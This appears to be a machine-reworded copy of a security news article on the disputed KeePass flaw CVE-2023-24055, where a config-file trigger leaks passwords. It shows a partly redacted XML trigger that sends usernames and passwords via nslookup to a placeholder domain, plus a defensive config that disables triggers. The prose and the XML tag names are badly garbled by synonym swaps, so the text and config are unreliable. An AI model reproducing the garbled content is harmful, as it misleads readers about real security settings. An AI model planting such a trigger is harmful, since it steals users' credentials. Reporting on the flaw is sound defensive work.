Password theft “vulnerability” reported in KeePass – bug or function? – Naked Safety
It has been a number of weeks for password managers – these useful instruments that show you how to give you a special password for each web site you utilize, after which hold monitor of all of them.
In late 2022, it was LastPass’s flip to be everywhere in the information when the corporate lastly admitted {that a} breach it suffered in August 2022 really ended up with prospects’ passwords. vaults are stolen from the cloud service the place they have been backed up.
(The cleartext passwords themselves weren’t stolen, as a result of the vaults have been encrypted, and LastPass did not have copies of anybody’s “grasp key” for the backup vaults themselves, but it surely was a more in-depth shave than most individuals have been blissful to listen to.)
Then it was LifeLock’s flip to be everywhere in the information when the corporate warned of what seemed like a rash of password guessing attacksin all probability primarily based on passwords stolen from a totally completely different website, possibly a while in the past, and possibly purchased on the darkish net just lately.
LifeLock itself wasn’t breached, however a few of its customers have been, because of password-sharing habits brought on by dangers they might not even keep in mind taking.
Rivals 1Password and BitWarden have additionally been within the information just lately, primarily based on studies of malicious adverts, apparently unintentionally issued by Google, that convincingly lured customers into replicating login pages geared toward phishing their account particulars.
Now it is KeePass’s flip in the newsthis time for one more cybersecurity subject: an alleged vulnerabilitythe jargon time period used for software program bugs that result in cybersecurity holes that attackers might exploit for nefarious functions.
Password sniffing made straightforward
We discuss with it as a vulnerability right here as a result of it has an official bug ID, issued by the US Nationwide Institute of Requirements and Know-how.
The bug has been synced CVE-2023-24055: An attacker who has write entry to the XML configuration file [can] get the cleartext passwords by including an export set off.
The declare about having the ability to get plaintext passwords is, sadly, true.
If I’ve written entry to your private recordsdata, together with your tn %APPDATA% folder, I can stealthily tweak the settings part to change any KeePass settings you’ve got already custom-made, or so as to add customizations when you’ve knowingly modified something…
. .
Notice that I needn’t Administrator privileges as a result of I needn’t mess with the precise set up folder the place the KeePass utility is saved, which is normally off-limits to common customers.
And I do not want entry to any locked international settings.
Apparently, KeePass goes out of its technique to cease your passwords being sniffed while you use them, together with utilizing tamper-proof methods to cease varied anti-keylogger tips even by customers who have already got sysadmin powers.
However the KeePass software program additionally makes it surprisingly straightforward to seize clear-text password knowledge, maybe in methods you may think about “too straightforward,” even for non-administrators.
It was a minute of labor to make use of the KeePass GUI to create a Set off occasion to run each time you copy a password to the clipboard, and to set that occasion to carry out a DNS lookup that included each the username and the password in query in cleartext:
We might then copy the not-terribly-obvious XML configuration for that possibility from our personal native configuration file into one other consumer’s configuration file on the system, whereupon they too will discover their passwords leaked onto the web by way of DNS lookups.
Though the XML configuration knowledge is generally readable and informative, KeePass curiously makes use of random knowledge strings referred to as GUIDs (quick for globally distinctive identifiers) to point the assorted Set off settings, in order that even a well-informed consumer would want an intensive reference record to know which triggers are set, and the way.
Here is what our DNS leak set off appears to be like like, though we have edited out a number of the particulars so you’ll be able to’t do instantaneous hurt simply by copying and pasting this textual content instantly:
<Set off>
<Guid>XXXXXXXXXXXXXXXXXXXX</Guid>
<Title>Copy</Title>
<Feedback>Steal stuff by way of DNS lookups</Feedback>
<Occasions>
<Occasion>
<TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
<Parameters>
<Parameter>0</Parameter>
<Parameter />
</Parameters>
</Occasion>
</Occasions>
<Circumstances />
<Actions>
<Motion>
<TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
<Parameters>
<Parameter>nslookup</Parameter>
<Parameter>XXXXX.XXXXX.blah.check</Parameter>
<Parameter>True</Parameter>
<Parameter>1</Parameter>
<Parameter />
</Parameters>
</Motion>
</Actions>
</Set off>
With this set off energetic, accessing a KeePass password causes the plaintext to leak out in a non-intrusive DNS lookup to a site of my alternative, which is blah.check on this instance.
Notice that actual attackers would virtually definitely scramble or obfuscate the stolen textual content, which might not solely make it tougher to identify when DNS leaks happen, however would additionally handle passwords containing non-ASCII characters, equivalent to accented letters or emojis, that in any other case can’t be utilized in DNS -names:
However is it actually a bug?
The tough query, nonetheless, is “Is that this actually a bug, or is it only a highly effective function that might be abused by somebody who already wants at the least as a lot management over your personal recordsdata as you do?”
Merely put, is it a vulnerability if somebody who already has management of your account can mess with recordsdata that your account is meant to have the ability to entry anyway?
When you may hope {that a} password supervisor would come with many additional layers of tampering to make it tougher to tamper with bugs/options of this type, it ought to CVE-2023-24055 actually be a CVE listed vulnerability?
In that case, would not you order as for instance DEL (delete file) and FORMAT should be “bugs”, too?
And is not it the very existence of PowerShell that makes probably harmful habits a lot simpler to impress (strive powerhsell get-clipboardfor instance), an inherent vulnerability?
That’s the place of KeePass, acknowledged by the next textual content, which was added to the “bug” detail on the NIST web site:
** disputed ** […] NOTE: the seller’s place is that the password database is just not supposed to be safe towards an attacker who has that degree of entry to the native pc.
what to do
If you happen to’re a stand-alone KeePass consumer, you’ll be able to examine for rogue triggers just like the “DNS Stealer” we created above by opening the KeePass app and looking the instruments > triggers… window:
Notice you could rotate the entire Set off system away from this window, just by deselecting the [ ] Allow set off system possibility…
…however that is not a worldwide setting, so it may be turned again on by way of your native config file, and due to this fact solely protects you towards errors, relatively than towards an attacker with entry to your account.
You’ll be able to disable the choice for everybody on the pc, with no manner for them to show it again on themselves, by modifying the worldwide “lock” file. KeePass.config.enforced.XMLdiscovered within the folder the place this system itself is put in.
The triggers might be eliminated for everybody in case your international XML forcing file appears to be like like this:
<?xml model="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Utility>
<TriggerSystem>
<Enabled>false</Enabled>
</TriggerSystem>
</Utility>
</Configuration>
(In case you are questioning, an attacker with write entry to the appliance listing to reverse this variation would virtually definitely have sufficient system-level energy to change the KeePass executable itself, or to put in and activate a standalone keylogger anyway.)
If you happen to’re a community administrator tasked with locking down KeePass in your customers’ computer systems in order that it is nonetheless versatile sufficient to assist them, however not versatile sufficient to assist cybercriminals by mistake, we suggest studying KeePass. Security Issues web page, the Triggers web page, and the Forced Configuration web page
title_words_as_hashtags]
